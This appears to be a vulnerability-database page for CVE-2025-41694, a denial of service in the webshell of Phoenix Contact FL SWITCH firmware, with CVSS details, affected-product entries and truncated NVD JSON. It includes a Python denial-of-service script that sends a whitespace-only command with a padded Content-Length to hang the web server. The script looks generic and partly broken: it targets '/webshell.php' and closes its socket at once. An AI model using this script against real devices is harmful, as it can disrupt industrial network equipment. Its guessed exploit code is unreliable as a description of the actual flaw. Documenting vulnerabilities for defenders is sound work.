CVE-2025-41694

Description

A low privileged remote attacker can run the webshell with an empty command containing whitespace. The server will then block until it receives more data, resulting in a DoS condition of the websserver.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:phoenixcontact:fl_switch_2708_pn_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:phoenixcontact:fl_switch_2708_pn:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:phoenixcontact:fl_switch_2708_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:phoenixcontact:fl_switch_2708:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:phoenixcontact:fl_switch_2608_pn_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:phoenixcontact:fl_switch_2608_pn:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:phoenixcontact:fl_switch_2608_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:phoenixcontact:fl_switch_2608:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:phoenixcontact:fl_switch_2516_pn_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:phoenixcontact:fl_switch_2516_pn:-:*:*:*:*:*:*:* - NOT VULNERABLE

Webshell应用（具体版本需参考官方公告）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket

def cve_2025_41694_poc(target_host, target_port, path):
    """
    CVE-2025-41694 PoC - Webshell Empty Command DoS
    Description: Low privileged remote attacker can run webshell with empty 
    command containing whitespace, causing server to block waiting for more data.
    """
    # Construct HTTP POST request with whitespace-only command
    headers = f"POST {path} HTTP/1.1\r\n"
    headers += f"Host: {target_host}:{target_port}\r\n"
    headers += "Content-Type: application/x-www-form-urlencoded\r\n"
    headers += "Content-Length: 100\r\n"
    headers += "Connection: keep-alive\r\n\r\n"
    
    # Empty command with whitespace characters
    body = "cmd=" + " " * 50 + "&param="
    
    request = headers + body
    
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((target_host, target_port))
        sock.send(request.encode())
        print(f"[+] Malicious request sent to {target_host}:{target_port}")
        print(f"[+] Payload: whitespace-only command")
        print(f"[+] Server should block waiting for more data")
        sock.close()
    except Exception as e:
        print(f"[-] Error: {e}")

# Usage example
# cve_2025_41694_poc('target.com', 80, '/webshell.php')

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-41694
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-41694
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-41694/
[4] VulDB https://vuldb.com/cve/CVE-2025-41694
[5] https://certvde.com/de/advisories/VDE-2025-071

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-41694", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:17:48.583", "lastModified": "2025-12-19T18:12:00.187", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A low privileged remote attacker can run the webshell with an empty command containing whitespace. The server will then block until it receives more data, resulting in a DoS condition of the websserver."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2708_pn_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "2084EFDB-9B37-4B62-8F09-C0A478D225F5"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2708_pn:-:*:*:*:*:*:*:*", "matchCriteriaId": "D1E0F77C-F116-4BF6-9ED4-39C5B2BE45D0"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2708_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "0F69B73C-5009-4FDE-AC40-03089D1724DB"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2708:-:*:*:*:*:*:*:*", "matchCriteriaId": "ACF0F7C6-D8C8-409D-B32E-33651C2768D3"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2608_pn_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "9D8B1EE5-CD80-4963-8E64-57ED5B75A236"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2608_pn:-:*:*:*:*:*:*:*", "matchCriteriaId": "7E2028DD-24BD-4541-B437-E7F97420BECE"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2608_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "FEB4D4F4-DAA9-4D15-BD23-D2F8D20651F0"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2608:-:*:*:*:*:*:*:*", "matchCriteriaId": "9066088C-2056-446A-A835-3A4F8EC71F69"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2516_pn_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "3B6BC580-8BDE-458D-852C-09E54FD43F36"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2516_pn:-:*:*:*:*:*:*:*", "matchCriteriaId": "D25577D8-A076-4950-B28B-5587DF927425"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2208c_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "010F7AFC-8E6B-4578-86CB-81E68535AF59"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2208c:-:*:*:*:*:*:*:*", "matchCriteriaId": "88AAEC46-8163-41F5-8E3D-42F650024A21"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2208_pn_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "88B80F56-8B2F-421B-B4D3-56FDDFA5A12A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2208_pn:-:*:*:*:*:*:*:*", "matchCriteriaId": "192418D5-9943-45B9-A2E3-42EAF53B1961"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2208_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "321C38BD-C448-476F-BBA9-5FCB1AA6CB43"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2208:-:*:*:*:*:*:*:*", "matchCriteriaId": "AFC8DDBB-B2F9-49A6-AF2E-069406D39C4E"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": fa ... (truncated)